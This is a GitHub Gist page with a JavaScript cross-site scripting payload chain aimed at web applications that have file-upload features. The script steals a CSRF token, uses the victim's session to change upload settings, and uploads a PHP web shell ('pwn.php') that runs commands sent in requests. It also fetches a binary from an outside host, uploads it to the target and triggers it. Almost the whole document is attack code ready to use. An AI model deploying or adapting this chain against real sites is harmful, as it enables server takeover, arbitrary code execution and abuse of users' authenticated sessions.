Last active
July 14, 2023 09:41
-
-
Save amriunix/3c79b9a2dc6283e3fbb9f282645abb69 to your computer and use it in GitHub Desktop.
Some XSS payload for File Upload, leaking CSRF tokens, updating data and triggering files
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function updateConfig(csrf) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/settings', true); | |
| xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); | |
| xhr.withCredentials = true; | |
| configPayload = 'save=1&user=admin&allowFileUpload=php&csrf=' + csrf; | |
| xhr.send(configPayload); | |
| } | |
| function getCSRF() { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('GET', 'application/vulnerable/to/fileUpload/settings', true); | |
| xhr.responseType = 'document'; | |
| xhr.onload = function () { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| var doc = xhr.responseXML; | |
| csrf = doc.getElementById('csrf_token').innerText; | |
| updateConfig(csrf); | |
| } | |
| }; | |
| xhr.send(); | |
| } | |
| function pwn(link) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('GET', link, true); | |
| xhr.withCredentials = true; | |
| xhr.send(); | |
| } | |
| function uploadFile() { | |
| boundary = '---------------------------1466369521412649741807627863'; | |
| payload = "<?php system($_REQUEST['cmd']); ?>"; | |
| body = ""; | |
| body += "--" + boundary + "\r\n"; | |
| body += 'Content-Disposition: form-data; name="newAttachment"; filename="pwn.php"\r\n'; | |
| body += 'Content-Type: application/x-php\r\n\r\n'; | |
| body += payload + "\r\n\r\n"; | |
| body += "--" + boundary + "--"; | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/upload.php', true); | |
| xhr.setRequestHeader('Content-type', 'multipart/form-data; boundary=' + boundary); | |
| xhr.withCredentials = true; | |
| xhr.onreadystatechange = function() { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| pwn(); | |
| } | |
| } | |
| xhr.send(body); | |
| } | |
| function uploadBinary(fileBlob, type) { | |
| var file = new File([fileBlob], "DownloadedFile.tgz", { | |
| type: type | |
| }); | |
| var formData = new FormData(); | |
| formData.append('fileFormName', file); | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('POST', '/application/vulnerable/to/fileUpload/upload.php', true); | |
| xhr.withCredentials = true; | |
| xhr.responseType = 'document'; | |
| xhr.onreadystatechange = function() { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| var doc = xhr.responseXML; | |
| triggerLink = doc.getElementsByTagName('SCRIPT')[0].innerText.split('\"')[7]; | |
| pwn(triggerLink); | |
| } | |
| } | |
| xhr.send(formData); | |
| } | |
| function downloadBinary(link) { | |
| xhr = new XMLHttpRequest(); | |
| xhr.open('GET', link, true); | |
| xhr.responseType = 'blob'; | |
| xhr.onreadystatechange = function() { | |
| if (this.readyState === XMLHttpRequest.DONE && this.status === 200) { | |
| var type = xhr.getResponseHeader('Content-Type'); | |
| var fileBlob = new Blob([this.response], { type: type }); | |
| uploadBinary(fileBlob, type); | |
| } | |
| } | |
| xhr.send(); | |
| } | |
| downloadBinary('http://domain.com/file/to/download'); | |
| getCSRF(); | |
| setTimeout(uploadFile, 3000); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment